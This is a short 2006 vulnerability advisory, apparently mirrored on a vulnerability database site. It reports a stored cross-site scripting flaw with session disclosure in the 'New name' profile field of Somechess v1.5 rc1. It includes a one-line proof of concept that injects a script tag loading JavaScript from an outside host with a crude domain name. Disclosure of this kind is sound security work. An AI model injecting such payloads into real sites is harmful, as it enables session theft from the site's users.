Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13275
HistoryJun 22, 2006 - 12:00 a.m.

Somechess v1.5 rc1 - XSS

2006-06-2200:00:00
vulners.com
13
JSON

Somechess v1.5 rc1

Homepage:
http://www.astrodogpress.org/chess/

Affected files:

*Profile input boxes

Upon dumping the sql data into the table if you get errors and it wont create the tables & data (like
it did to me), then just remove all the " from the sql file. You'll also have to manually add players &
their pw's (md5 hashed) via phpmyadmin or whatever you use. Theres also a php error on menu.php that
you'll have to fix since it won't allow you to connect to the game DB

XSS vuln with session disclosure from "New name" profile input box.

Data isn't sanatized before being generated. PoC:

<SCRIPT SRC=http://youfucktard.com/xss.js&gt;&lt;/SCRIPT&gt;

Screenshots:
http://youfucktard.com/xsp/somechess1.jpg
http://youfucktard.com/xsp/somechess2.jpg

JSON